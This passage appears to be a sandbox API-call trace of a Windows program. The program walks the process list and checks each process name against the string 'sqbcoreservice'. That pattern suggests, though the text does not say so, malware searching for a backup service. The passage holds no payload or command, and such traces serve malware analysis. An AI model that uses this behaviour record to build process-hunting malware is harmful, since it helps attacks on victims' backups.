(lpFirst="[System Process]", lpSrch="sqbcoreservice") returned 0x0 [0096.122] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0096.123] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574e30 [0096.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574e30, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0096.123] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0096.123] StrStrIA (lpFirst="System", lpSrch="sqbcoreservice") returned 0x0 [0096.123] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.124] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3576a30 [0096.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3576a30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0096.124] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0096.124] StrStrIA (lpFirst="smss.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.124] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.125] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576c88 [0096.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3576c88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0096.125] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0096.126] StrStrIA (lpFirst="csrss.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.126] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.127] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576bb0 [0096.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3576bb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0096.127] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0096.127] StrStrIA (lpFirst="wininit.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.127] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.129] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576a48 [0096.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3576a48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0096.129] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0096.129] StrStrIA (lpFirst="csrss.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.129] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.130] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576ad8 [0096.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3576ad8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0096.130] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0096.130] StrStrIA (lpFirst="winlogon.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.130] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.132] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576b80 [0096.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3576b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0096.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0096.132] StrStrIA (lpFirst="services.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.132] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.133] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576a78 [0096.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3576a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0096.133] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0096.133] StrStrIA (lpFirst="lsass.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.133] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.135] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576a60 [0096.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.135] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.135] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0096.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.136] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576c10 [0096.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0096.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0096.136] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.136] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0096.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.137] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576c28 [0096.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3576c28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0096.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0096.138] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.138] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.139] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576c70 [0096.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.139] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.139] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.141] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e40 [0096.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574e40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0096.141] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0096.141] StrStrIA (lpFirst="dwm.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.141] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.142] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576a18 [0096.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.142] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.142] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.144] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576be0 [0096.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576be0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.144] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.144] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.145] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576c40 [0096.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576c40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.145] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.145] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.146] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35769a0 [0096.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35769a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.146] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.146] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.148] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576b98 [0096.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.148] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.148] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.149] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576c58 [0096.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576c58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.149] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.149] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.150] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576a90 [0096.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.151] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.151] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.165] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576aa8 [0096.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3576aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.165] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.165] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.166] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35769b8 [0096.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35769b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.166] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.166] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.166] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.167] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35769d0 [0096.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35769d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0096.167] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0096.167] StrStrIA (lpFirst="svchost.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.167] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, 